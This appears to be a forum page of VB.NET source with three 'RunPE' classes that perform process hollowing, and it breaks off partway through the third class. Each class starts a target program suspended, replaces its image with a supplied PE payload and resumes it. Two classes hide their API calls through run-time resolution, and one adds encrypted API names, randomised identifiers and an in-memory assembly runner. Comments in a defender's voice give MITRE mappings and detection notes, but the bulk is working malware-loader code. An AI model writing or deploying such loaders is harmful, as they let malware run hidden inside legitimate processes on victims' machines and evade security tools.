Code:
Public Class RunPE1
' Static imports of LoadLibraryA and GetProcAddress under the opaque aliases
' apii9/apii0. Every other native routine in this class is resolved through
' these two at run time (see CreateAPI), so the remaining API names appear
' only as string literals in the assembly, not as declared imports.
Public Declare Function apii9 Lib "kernel32" Alias "LoadLibraryA" (ByVal name As String) As IntPtr
Public Declare Function apii0 Lib "kernel32" Alias "GetProcAddress" (ByVal handle As IntPtr, ByVal name As String) As IntPtr
' Resolves export `method` from library `name` (LoadLibraryA + GetProcAddress
' via apii9/apii0) and wraps the returned address in a delegate of type T.
' Neither the module handle nor the export address is checked for zero before
' it is handed to Marshal.GetDelegateForFunctionPointer.
' Triage note: the library/function string pairs passed to this helper are the
' most direct static indicator of which native calls the class makes.
Function CreateAPI(Of T)(ByVal name As String, ByVal method As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(apii0(apii9(name), method), GetType(T)), Object), T)
End Function
' Delegate shapes for the routines resolved at run time. The alias-to-API
' mapping is taken from the CreateAPI calls in ReadPtr and start:
'   apii1 -> ntdll!NtGetContextThread     apii5 -> ntdll!NtSetContextThread
'   apii2 -> ntdll!NtUnmapViewOfSection   apii6 -> kernel32!VirtualAllocEx
'   apii3 -> ntdll!NtReadVirtualMemory    apii7 -> ntdll!NtWriteVirtualMemory
'   apii4 -> ntdll!NtResumeThread
' The thread context is passed as a raw UInteger array instead of a typed
' CONTEXT structure, so start addresses register slots by array index.
Delegate Function apii1(ByVal hThr As IntPtr, ByVal CNTXT As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function apii2(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
Delegate Function apii3(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSS As Integer, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function apii4(ByVal hThread As IntPtr, ByVal SC As IntPtr) As UInteger
Delegate Function apii5(ByVal hThr As IntPtr, ByVal CNTXT As UInteger()) As <MarshalAs(UnmanagedType.Bool)> Boolean
Delegate Function apii6(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal SS As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
Delegate Function apii7(ByVal hProcess As IntPtr, ByVal VABA As IntPtr, ByVal lpBuffer As Byte(), ByVal nSS As UInteger, ByVal NOBW As Integer) As Boolean
' apii8 is a static import of CreateProcessW. The startup-info and
' process-information arguments are untyped Byte()/IntPtr() buffers.
Public Declare Auto Function apii8 Lib "kernel32" Alias "CreateProcessW" (ByVal appName As String, ByVal commandLine As StringBuilder, ByVal PTA As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, ByVal creation As Integer, ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo As Byte(), ByVal pInfo As IntPtr()) As <MarshalAs(UnmanagedType.Bool)> Boolean
' Reads lSS bytes (default 4) from address lPtr in the *current* process via
' ntdll!NtReadVirtualMemory and returns the value as an Integer. start uses
' it to read PE header fields out of its own payload buffer.
' The status returned by the native call is ignored; lRes keeps its default
' value if nothing is read.
Private Function ReadPtr(ByVal lPtr As Long, Optional ByVal lSS As Long = &H4) As Integer
Dim lRes As IntPtr
Dim lBr As Integer
Dim api4 As apii3 = CreateAPI(Of apii3)("ntdll", "NtReadVirtualMemory")
Call api4(Process.GetCurrentProcess.Handle, lPtr, lRes, lSS, lBr)
Return lRes
End Function
' Process-hollowing routine (MITRE ATT&CK T1055.012): starts sExe suspended,
' replaces its mapped image with the PE held in Buffbawa and resumes it.
' Returns False only when a .NET exception is raised. No native return value
' is inspected, so True does not show that any individual step succeeded.
' The header offsets and Int32 pointer arithmetic assume a 32-bit PE and
' 32-bit processes.
' Defender view: the parent creates a child with CREATE_SUSPENDED and then
' performs cross-process unmap, RWX allocation, memory writes, a thread
' context change and a resume, all against that child. Afterwards the child
' would normally run code that does not correspond to its on-disk image.
Public Function start(ByVal Buffbawa As Byte(), ByVal sExe As String) As Boolean
Try
' Pin the payload only long enough to take its address as an Integer.
Dim hGC As GCHandle = GCHandle.Alloc(Buffbawa, GCHandleType.Pinned) : Dim hModuleBase As Integer = hGC.AddrOfPinnedObject : hGC.Free()
Dim PTA As IntPtr = IntPtr.Zero
' tPI receives the process-information output: tPI(0) is used below as the
' process handle and tPI(1) as the thread handle.
Dim tPI As IntPtr() = New IntPtr(3) {}
' 68 zero bytes passed as the startup-info structure.
Dim tSI As Byte() = New Byte(67) {}
' Offset 60 (&H3C) of the DOS header: file offset of the NT headers.
Dim N2 As Integer = BitConverter.ToInt32(Buffbawa, 60)
Dim IB As Integer
' 179 DWORDs hold the x86 thread context; &H10002 requests the integer
' registers (CONTEXT_i386 Or CONTEXT_INTEGER).
Dim CNTXT As UInteger() = New UInteger(178) {}
CNTXT(0) = &H10002
' Creation flag 4 = CREATE_SUSPENDED.
apii8(Nothing, New StringBuilder(sExe), PTA, PTA, False, 4, PTA, Nothing, tSI, tPI)
' hPE = in-memory address of the payload's NT headers; +&H34 is ImageBase.
Dim hPE As Integer = (hModuleBase + ReadPtr(hModuleBase + &H3C))
IB = ReadPtr(hPE + &H34)
' Unmap whatever the child has mapped at the payload's preferred base.
Dim api3 As apii2 = CreateAPI(Of apii2)("ntdll", "NtUnmapViewOfSection")
api3(tPI(0), IB)
' Allocate SizeOfImage (+&H50) bytes at that base in the child:
' &H3000 = MEM_COMMIT Or MEM_RESERVE, &H40 = PAGE_EXECUTE_READWRITE.
Dim api7 As apii6 = CreateAPI(Of apii6)("kernel32", "VirtualAllocEx")
Dim VABA As IntPtr = api7(tPI(0), IB, ReadPtr(hPE + &H50), &H3000, &H40)
' SA and SS are reassigned inside the section loop before they are used.
Dim SA As New IntPtr(BitConverter.ToInt32(Buffbawa, N2 + &H34))
Dim SS As New IntPtr(BitConverter.ToInt32(Buffbawa, N2 + 80))
Dim WRET As Integer
Dim NOBW As Integer
' Write the PE headers (SizeOfHeaders, +&H54) to the new allocation.
Dim api8 As apii7 = CreateAPI(Of apii7)("ntdll", "NtWriteVirtualMemory")
api8(tPI(0), VABA, Buffbawa, CUInt(CInt(ReadPtr(hPE + &H54))), WRET)
' One pass per section (NumberOfSections, 2 bytes at +&H6). Each 40-byte
' section header starts at N2 + &HF8; as ten Int32 values, index 3 is
' VirtualAddress, 4 is SizeOfRawData and 5 is PointerToRawData.
For i = 0 To ReadPtr(hPE + &H6, 2) - 1
Dim Destination As Integer() = New Integer(9) {}
Buffer.BlockCopy(Buffbawa, (N2 + &HF8) + (i * 40), Destination, 0, 40)
Dim B2 As Byte() = New Byte((Destination(4) - 1)) {}
Buffer.BlockCopy(Buffbawa, Destination(5), B2, 0, B2.Length)
SS = New IntPtr(VABA.ToInt32() + Destination(3))
SA = New IntPtr(B2.Length)
api8(tPI(0), SS, B2, CUInt(SA), NOBW)
Next i
' Fetch the suspended thread's context. Index 41 of the DWORD array is Ebx
' in the x86 CONTEXT layout; Ebx + 8 is written with the new image base.
Dim api2 As apii1 = CreateAPI(Of apii1)("ntdll", "NtGetContextThread")
api2(tPI(1), CNTXT)
api8(tPI(0), CNTXT(41) + &H8, BitConverter.GetBytes(VABA.ToInt32()), CUInt(&H4), NOBW)
' Index &H2C (44) is Eax; it is set to ImageBase + AddressOfEntryPoint (+&H28).
CNTXT(&H2C) = IB + ReadPtr(hPE + &H28)
Dim api6 As apii5 = CreateAPI(Of apii5)("ntdll", "NtSetContextThread")
api6(tPI(1), CNTXT)
' Resume the primary thread of the child.
Dim api5 As apii4 = CreateAPI(Of apii4)("ntdll", "NtResumeThread")
api5(tPI(1), 0)
Catch ex As Exception
' Any managed exception is swallowed and reported only as False.
Return False
End Try
Return True
End Function
End Class
Code:
Public Class RunPE2
' Win32 memory-protection constants. Within this class they are consumed by
' Protect, which maps PE section characteristics to a page protection.
Public Const PAGE_NOCACHE As Long = &H200
Public Const PAGE_EXECUTE_READWRITE As Long = &H40
Public Const PAGE_EXECUTE_WRITECOPY As Long = &H80
Public Const PAGE_EXECUTE_READ As Long = &H20
Public Const PAGE_EXECUTE As Long = &H10
Public Const PAGE_WRITECOPY As Long = &H8
Public Const PAGE_NOACCESS As Long = &H1
Public Const PAGE_READWRITE As Long = &H4
Public Const PAGE_READONLY As UInt32 = &H2
' Process hollowing (MITRE ATT&CK T1055.012) built on the typed structures
' and static imports of the nested class H. Creates `target` suspended,
' unmaps its image, copies the PE in `data` into it section by section and
' redirects the primary thread to the new entry point.
' Returns nothing, so callers cannot tell which step, if any, failed.
' Assumes a 32-bit PE (fixed 248-byte NT headers) and 32-bit pointers.
' Defender view: unlike the run-time-resolved variants on this page, every
' API here is a declared import (CreateProcess, ZwUnmapViewOfSection,
' VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, SetThreadContext,
' ResumeThread), so the combination is visible to static inspection.
Shared Sub start(ByVal data() As Byte, ByVal target As String)
Dim C = New H.Context, SH As H.Section_Header, PI = New H.Process_Information, SI = New H.Startup_Information, PS = New H.Security_Flags, TS = New H.Security_Flags
' Pin the payload to read its DOS header and keep its address as an Integer.
Dim GC = GCHandle.Alloc(data, GCHandleType.Pinned)
Dim Buffer As Integer = GC.AddrOfPinnedObject.ToInt32
Dim DH As New H.DOS_Header
DH = Marshal.PtrToStructure(GC.AddrOfPinnedObject, DH.GetType)
GC.Free()
' Creation flag 4 = CREATE_SUSPENDED.
If H.CreateProcess(Nothing, target, PS, TS, False, 4, Nothing, Nothing, SI, PI) = 0 Then Return
' DH.Address is the last DOS-header field (offset of the NT headers).
Dim NH As New H.NT_Headers
NH = Marshal.PtrToStructure(New IntPtr(Buffer + DH.Address), NH.GetType)
Dim Address, Offset As Long, ret As UInteger
SI.CB = Len(SI)
' 65538 = &H10002 (CONTEXT_i386 Or CONTEXT_INTEGER).
C.Flags = 65538
' 17744 = &H4550 ("PE"), 23117 = &H5A4D ("MZ"). This validation runs after
' the child has already been created; on mismatch the Sub simply returns.
If NH.Signature <> 17744 Or DH.Magic <> 23117 Then Return
' Read the child's current image base from Ebx + 8 and unmap it.
If H.GetThreadContext(PI.Thread, C) And H.ReadProcessMemory(PI.Process, C.Ebx + 8, Address, 4, 0) >= 0 And H.ZwUnmapViewOfSection(PI.Process, Address) >= 0 Then
' Allocate SImage bytes at the payload's preferred base (Optional.Image):
' 12288 = &H3000 (MEM_COMMIT Or MEM_RESERVE), 4 = PAGE_READWRITE.
Dim ImageBase As UInt32 = H.VirtualAllocEx(PI.Process, NH.Optional.Image, NH.Optional.SImage, 12288, 4)
If ImageBase <> 0 Then
' Headers first (SHeaders bytes), then each section.
H.WriteProcessMemory(PI.Process, ImageBase, data, NH.Optional.SHeaders, ret)
' 248 = size of the 32-bit NT headers; section headers are 40 bytes each.
Offset = DH.Address + 248
For I As Integer = 0 To NH.File.Sections - 1
SH = Marshal.PtrToStructure(New IntPtr(Buffer + Offset + I * 40), SH.GetType)
Dim Raw(SH.Size) As Byte
For Y As Integer = 0 To SH.Size - 1 : Raw(Y) = data(SH.Pointer + Y) : Next
H.WriteProcessMemory(PI.Process, ImageBase + SH.Address, Raw, SH.Size, ret)
' Per-section protection is derived from the section flags by Protect.
H.VirtualProtectEx(PI.Process, ImageBase + SH.Address, SH.Misc.Size, Protect(SH.Flags), Address)
Next I
' Store the new base at Ebx + 8 and point Eax at the payload entry point.
Dim T = BitConverter.GetBytes(ImageBase)
H.WriteProcessMemory(PI.Process, C.Ebx + 8, T, 4, ret)
C.Eax = ImageBase + NH.Optional.Address
H.SetThreadContext(PI.Thread, C)
H.ResumeThread(PI.Thread)
End If
End If
End Sub
' Emulates an unsigned right shift by dividing by 2 ^ lNumberOfBitsToShift.
' The quotient is a Double that is implicitly converted to the Long return
' value. NOTE(review): that conversion rounds rather than truncates, so the
' result can differ from a true bit shift - confirm before reusing.
Private Shared Function RShift(ByVal lValue As Long, ByVal lNumberOfBitsToShift As Long) As Long
RShift = vbLongToULong(lValue) / (2 ^ lNumberOfBitsToShift)
End Function
' Returns Value as a Double, adding 2^32 when Value is negative so that a
' negative number is treated as its unsigned 32-bit equivalent.
Private Shared Function vbLongToULong(ByVal Value As Long) As Double
Const OFFSET_4 = 4294967296.0#
If Value < 0 Then
vbLongToULong = Value + OFFSET_4
Else
vbLongToULong = Value
End If
End Function
' Maps PE section characteristics to a page-protection constant. The table
' index is RShift(characteristics, 29), i.e. the three highest flag bits
' (execute, read, write in the PE section-flag layout).
' Index 0 yields PAGE_NOACCESS; indices 5 and 7 yield PAGE_EXECUTE_READWRITE.
Private Shared Function Protect(ByVal characteristics As Long) As Long
Dim Third() As Object = {PAGE_NOACCESS, PAGE_EXECUTE, PAGE_READONLY, _
PAGE_EXECUTE_READ, PAGE_READWRITE, PAGE_EXECUTE_READWRITE, _
PAGE_READWRITE, PAGE_EXECUTE_READWRITE}
Protect = Third(RShift(characteristics, 29))
End Function
' Nested container for the native structures and static imports that
' RunPE2.start uses. EditorBrowsable(1) hides the class from IntelliSense.
' StructLayout(0) is LayoutKind.Sequential; CharSet:=3 is CharSet.Unicode.
' Field names are abbreviated, so the structures are best identified by field
' order and size against the Windows SDK definitions.
<EditorBrowsable(1)> Friend Class H
' x86 thread context: flags, debug registers, floating-point save area,
' segment and general-purpose registers, extended register area.
<StructLayout(0)> Structure Context
Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As Save
Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte()
End Structure
' Floating-point save area embedded in Context.
<StructLayout(0)> Structure Save
Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
Dim State As UInt32
End Structure
Structure Misc
Dim Address, Size As UInt32
End Structure
' PE section header as read by start (40-byte stride). start reads Address,
' Size, Pointer, Flags and Misc.Size from it.
' NOTE(review): Name is declared as a single Byte; the layout appears to
' rely on default field alignment to line up with the on-disk header.
Structure Section_Header
Dim Name As Byte, Misc As Misc, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32
End Structure
' Output of CreateProcess: process and thread handles plus their ids.
Structure Process_Information
Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer
End Structure
<StructLayout(0, CharSet:=3)> Structure Startup_Information
Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
End Structure
' Passed for both the process and thread security-attribute parameters.
<StructLayout(0)> Structure Security_Flags
Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer
End Structure
' DOS header: Magic is compared with 23117 (&H5A4D) in start; Address, the
' final field, is used as the offset of the NT headers.
<StructLayout(0)> Structure DOS_Header
Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As UInt16()
Dim ID, Info As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As UInt16()
Dim Address As Int32
End Structure
' NT headers: Signature is compared with 17744 (&H4550) in start.
Structure NT_Headers
Dim Signature As UInt32, File As File_Header, [Optional] As Optional_Headers
End Structure
<StructLayout(0)> Structure File_Header
Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16
End Structure
' 32-bit optional header. By field position, Address is the entry-point RVA,
' Image the preferred image base, SImage the image size and SHeaders the
' header size; these are the four members start reads.
<StructLayout(0)> Structure Optional_Headers
Public Magic As UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As UInt32, SectionA, FileA As UInt32
Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, Version, SImage, SHeaders, Checksum As UInt32, Subsystem, Flags As UInt16
Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public DataDirectory As Data_Directory()
End Structure
<StructLayout(0)> Structure Data_Directory
Dim Address, Size As UInt32
End Structure
' Static imports. All of these land in the assembly's metadata under their
' real names, which makes this variant straightforward to flag statically.
Declare Auto Function CreateProcess Lib "kernel32" (ByVal name As String, ByVal command As String, ByRef process As Security_Flags, ByRef thread As Security_Flags, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As Startup_Information, <Out()> ByRef info As Process_Information) As Boolean
Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal buffer As Byte(), ByVal size As IntPtr, <Out()> ByRef written As Integer) As Boolean
Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByRef buffer As IntPtr, ByVal size As IntPtr, ByRef read As Integer) As Integer
Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UIntPtr, ByVal [new] As UIntPtr, <Out()> ByVal old As UInt32) As Integer
Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As IntPtr, ByVal address As IntPtr) As Long
Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As IntPtr) As UInt32
Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Context) As Boolean
Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Context) As Boolean
End Class
End Class
Code:
Public Class RunPE3
' Win32 memory-protection constants. None of them is referenced by the other
' members of RunPE3 shown on this page.
Public Const PageNoCache As Long = &H200
Public Const PageNoAccess As Long = &H1
Public Const PageReadWrite As Long = &H4
Public Const PageExecuteReadWrite As Long = &H40
Public Const PageWriteCopy As Long = &H8
Public Const PageExecuteWriteCopy As Long = &H80
Public Const PageReadOnly As UInt32 = &H2
Public Const PageExecuteRead As Long = &H20
Public Const PageExecute As Long = &H10
' Loads a managed assembly from a byte array (Assembly.Load) and invokes its
' entry point by reflection, passing an empty String array when the entry
' point takes one parameter. The assembly is loaded from memory, not a file.
' Shares its name with the generic function dop(Of T) further down; this
' overload is not called anywhere in the lines of RunPE3 shown here.
Private Shared Sub dop(ByVal dop As Object)
Dim entryPoint As MethodInfo = Assembly.Load(DirectCast(dop, Byte())).EntryPoint
If (entryPoint.GetParameters.Length = 1) Then
entryPoint.Invoke(Nothing, New Object() {New String(0 - 1) {}})
Else
entryPoint.Invoke(Nothing, Nothing)
End If
End Sub
' String de-obfuscation helper: Base64-decodes b and decrypts it with
' TripleDES in ECB mode with PKCS7 padding, returning the UTF-8 plaintext.
' When d is True the key is the MD5 hash of s7O; otherwise the UTF-8 bytes of
' s7O are used directly as the key.
' Defender view: start passes only literal Base64 blobs and literal key
' strings, so the plaintexts are recoverable offline and the literals can be
' used as static signatures for this snippet. ECB with an unsalted MD5-derived
' key hides strings from casual inspection only.
Public Shared Function Tdt(ByVal b As String, ByVal s7O As String, ByVal d As Boolean) _
As String
Dim keyArray As Byte()
Dim toEncryptArray As Byte() = Convert.FromBase64String(b)
If d Then
Dim hashmd5 = New MD5CryptoServiceProvider()
keyArray = hashmd5.ComputeHash(UTF8Encoding.UTF8.GetBytes(S7o))
Else
keyArray = UTF8Encoding.UTF8.GetBytes(S7o)
End If
Dim tdes = New TripleDESCryptoServiceProvider()
tdes.Key = keyArray
tdes.Mode = CipherMode.ECB
tdes.Padding = PaddingMode.PKCS7
Dim cTransform As ICryptoTransform = tdes.CreateDecryptor()
Dim resultArray As Byte() = cTransform.TransformFinalBlock(toEncryptArray, 0, toEncryptArray.Length)
Return UTF8Encoding.UTF8.GetString(resultArray)
End Function
' Process hollowing (MITRE ATT&CK T1055.012) with the same statement flow as
' RunPE2.start on this page. Identifiers are randomised, and every native
' routine is resolved at run time from an encrypted library/function name
' pair (Tdt + dop(Of T)).
' The plaintext names are not shown on the page. The mapping noted below is
' inferred from each delegate's signature and call position - confirm by
' decrypting the literals offline.
' Defender view: renaming and string encryption leave the numeric constants
' (4, 12288, 65539, 17744, 23117, 248, 40), the call order and the
' cross-process behaviour unchanged.
Public Shared Sub start(ByVal data() As Byte, ByVal target As String)
Dim s7O = New Context
Dim asb As SectionHeader
Dim kf7 = New ProcessInformation
Dim qnj = New StartupInformation
Dim dlh = New SecurityFlags
Dim txj = New SecurityFlags
' Pin the payload, read its DOS header, keep its address as an Integer.
Dim gha = GCHandle.Alloc(data, GCHandleType.Pinned)
Dim a1u As Integer = gha.AddrOfPinnedObject.ToInt32
Dim zvz As New DosHeader
zvz = Marshal.PtrToStructure(gha.AddrOfPinnedObject, zvz.GetType)
gha.Free()
' Eight run-time-resolved delegates. Each local variable has the same name
' as its delegate type. Presumed roles, by signature and use below:
'   srhJrsWaVYRcz2Xx  - process creation      SRHJrsWaVYRcz2Xx3 - unmap view
'   SRHJrsWaVYRcz2Xx5 - get thread context    SRHJrsWaVYRcz2Xx2 - remote allocate
'   SRHJrsWaVYRcz2Xx1 - remote read           SRHJrsWaVYRcz2Xx0 - remote write
'   SRHJrsWaVYRcz2Xx6 - set thread context    SRHJrsWaVYRcz2Xx4 - resume thread
Dim _
srhJrsWaVYRcz2Xx As srhJrsWaVYRcz2Xx = dop(Of srhJrsWaVYRcz2Xx)(Tdt("dvRCNLjP+OuDJ32lam/k7Q==", _
"S83d7wGVdKDsMOqr", True), Tdt("jVjC9jDlRaV8g4IV26grFQ==", _
"SZZK05oR9pHg0PaJ", True))
Dim _
SRHJrsWaVYRcz2Xx5 As SRHJrsWaVYRcz2Xx5 = dop(Of SRHJrsWaVYRcz2Xx5)(Tdt("+XzOgO0RCk73yPGKa4WLfA==", _
"srhJrsWaVYRcz2Xx", True), Tdt("qo8pD7P5GBlriEXMgDjA55Q8ltzvdLGV", _
"S6NMAgIR5ZbH5AQF", True))
Dim _
SRHJrsWaVYRcz2Xx1 As SRHJrsWaVYRcz2Xx1 = dop(Of SRHJrsWaVYRcz2Xx1)(Tdt("dvRCNLjP+OuDJ32lam/k7Q==", _
"S83d7wGVdKDsMOqr", True), Tdt("CHybFkT/j4LSIvu87v/GsdSlLqbljCkk", _
"SFCvzqdp9dywEjDp", True))
Dim _
SRHJrsWaVYRcz2Xx0 As SRHJrsWaVYRcz2Xx0 = dop(Of SRHJrsWaVYRcz2Xx0)(Tdt("KyJpuPW5eg22C8dC5G+KVg==", _
"SZZK05oR9pHg0PaJ", True), Tdt("kf61Dhidwz9wMwOjSHK4YETTLNhxuGIH", _
"SMHj7OFygWCUKZbn", True))
Dim _
SRHJrsWaVYRcz2Xx3 As SRHJrsWaVYRcz2Xx3 = dop(Of SRHJrsWaVYRcz2Xx3)(Tdt("wZ7TXAXtVbQ=", _
"SeguhaHOHZflQCwj", True), Tdt("Dm/s3b+yoYApV1X8rEQ58NdVjRFWgfOj", _
"SeguhaHOHZflQCwj", True))
Dim _
SRHJrsWaVYRcz2Xx2 As SRHJrsWaVYRcz2Xx2 = dop(Of SRHJrsWaVYRcz2Xx2)(Tdt("TtYu0Pbxw42UPJbc73SxlQ==", _
"S6NMAgIR5ZbH5AQF", True), Tdt("FBp928xkwqCDSQAymqelKg==", _
"SR6GfUyCEmufKk6g", True))
Dim _
SRHJrsWaVYRcz2Xx6 As SRHJrsWaVYRcz2Xx6 = dop(Of SRHJrsWaVYRcz2Xx6)(Tdt("9RyvxWOKu9f40EKcv4MI4Q==", _
"SFCvzqdp9dywEjDp", True), Tdt("wORCMZTJ0qdbvNZEEc13+DihaxMtFKfr", _
"SBq3UqPpfbuWsoDp", True))
Dim _
SRHJrsWaVYRcz2Xx4 As SRHJrsWaVYRcz2Xx4 = dop(Of SRHJrsWaVYRcz2Xx4)(Tdt("Tk2/qwiH6LqBDrgBBdYjRQ==", _
"SMHj7OFygWCUKZbn", True), Tdt("YmZbgg8aZnt59bygj4ec5w==", _
"SvcDm2KU6uHfNz8h", True))
' First process-creation call; creation flag 4 = CREATE_SUSPENDED.
If srhJrsWaVYRcz2Xx _
(Nothing, target, dlh, txj, False, 4, Nothing, Nothing, qnj, kf7) = 0 Then Return
Dim dav As New NtHeaders
dav = Marshal.PtrToStructure(New IntPtr(a1u + zvz.Address), dav.GetType)
Dim address, Offset As Long, ret As UInteger
qnj.Cba = Len(qnj)
' 65539 = &H10003 (CONTEXT_i386 Or CONTEXT_CONTROL Or CONTEXT_INTEGER).
s7O.Flags = 65539
' 17744 = &H4550 ("PE"), 23117 = &H5A4D ("MZ").
If dav.Signature <> 17744 Or zvz.Magic <> 23117 Then Return
' The same creation call is issued a second time with identical arguments,
' overwriting kf7. A run that reaches this point has therefore started two
' suspended children of `target`, which is itself an observable pattern.
If srhJrsWaVYRcz2Xx _
(Nothing, target, dlh, txj, False, 4, Nothing, Nothing, qnj, _
kf7) = 0 Then Return
' Get context, read the current image base from Ebx + 8, unmap it. None of
' the three return values is checked.
SRHJrsWaVYRcz2Xx5(kf7.Thread, s7O)
SRHJrsWaVYRcz2Xx1(kf7.Process, s7O.Ebx + 8, address, 4, 0)
SRHJrsWaVYRcz2Xx3(kf7.Process, address)
' Allocate SImage bytes at the payload's preferred base: 12288 = &H3000
' (MEM_COMMIT Or MEM_RESERVE), protection 4 = PAGE_READWRITE.
Dim pCuFZOVYE2lA9TtkU As UInt32 = _
SRHJrsWaVYRcz2Xx2(kf7.Process, dav.Optional.Image, dav.Optional.SImage, 12288, 4)
If pCuFZOVYE2lA9TtkU <> 0 Then
' Headers first, then each 40-byte section header starting 248 bytes after
' the NT-header offset.
SRHJrsWaVYRcz2Xx0(kf7.Process, pCuFZOVYE2lA9TtkU, data, dav.Optional.SHeaders, ret)
Offset = zvz.Address + 248
For I As Integer = 0 To dav.File.Sections - 1
asb = Marshal.PtrToStructure(New IntPtr(a1u + Offset + I * 40), asb.GetType)
Dim Raw(asb.Size) As Byte
For Y As Integer = 0 To asb.Size - 1 : Raw(Y) = data(asb.Pointer + Y) : Next
SRHJrsWaVYRcz2Xx0 _
(kf7.Process, pCuFZOVYE2lA9TtkU + asb.Address, Raw, asb.Size, _
ret)
Next I
' Store the new base at Ebx + 8, point Eax at the payload entry point, apply
' the context and resume the thread.
Dim T = BitConverter.GetBytes(pCuFZOVYE2lA9TtkU)
SRHJrsWaVYRcz2Xx0(kf7.Process, s7O.Ebx + 8, T, 4, ret)
s7O.Eax = pCuFZOVYE2lA9TtkU + dav.Optional.Address
SRHJrsWaVYRcz2Xx6(kf7.Thread, s7O)
SRHJrsWaVYRcz2Xx4(kf7.Thread)
End If
End Sub
' The only two static imports in RunPE3. Together with dop(Of T) they resolve
' every other native routine at run time, so GetProcAddress and LoadLibraryA
' are the only API names visible in this class's import declarations.
<DllImport("kernel32", CharSet:=CharSet.Ansi, SetLastError:=True, ExactSpelling:=True)> Private Shared _
Function GetProcAddress _
(ByVal handle As IntPtr, <MarshalAs(UnmanagedType.VBByRefStr)> ByRef JO3P0nWH9RI As String) _
As IntPtr
End Function
' Loads (or returns the handle of) the library named by the argument.
<DllImport("kernel32", CharSet:=CharSet.Ansi, SetLastError:=True, ExactSpelling:=True)> Private Shared _
Function LoadLibraryA(<MarshalAs(UnmanagedType.VBByRefStr)> ByRef JO3P0nWH9RI As String) As IntPtr
End Function
' Resolves export GF5g8nwopw from library JO3P0nWH9RI with LoadLibraryA +
' GetProcAddress and wraps the address in a delegate of type T.
' Neither the module handle nor the export address is checked for zero.
' start calls it only with strings produced by Tdt, so the names never appear
' in plaintext in the assembly.
Private Shared Function dop(Of T)(ByVal JO3P0nWH9RI As String, ByVal GF5g8nwopw As String) As T
Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer _
(GetProcAddress(LoadLibraryA(JO3P0nWH9RI), GF5g8nwopw), _
GetType(T)), Object), T)
End Function
' Native structures used by RunPE3.start. Field for field they match the
' structures nested in RunPE2.H on this page; only some type and member
' names were changed (for example Name -> JO3P0nWH9RI, CB -> Cba,
' DataDirectory -> CacaCirectory). StructLayout(0) is LayoutKind.Sequential.
' x86 thread context; start reads Ebx and writes Eax.
<StructLayout(0)> Structure Context
Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As Save
Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte()
End Structure
' Floating-point save area embedded in Context.
<StructLayout(0)> Structure Save
Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
Dim State As UInt32
End Structure
Structure Misc
Dim Address, Size As UInt32
End Structure
' PE section header (40-byte stride in start); start reads Address, Size and
' Pointer from it.
Structure SectionHeader
Dim JO3P0nWH9RI As Byte, _
Misc As Misc, _
Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32
End Structure
' Output of the process-creation call: handles and ids of the new process.
Structure ProcessInformation
Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer
End Structure
<StructLayout(0, CharSet:=3)> Structure StartupInformation
Dim Cba As Integer, _
ReservedA, Desktop, Title As String, _
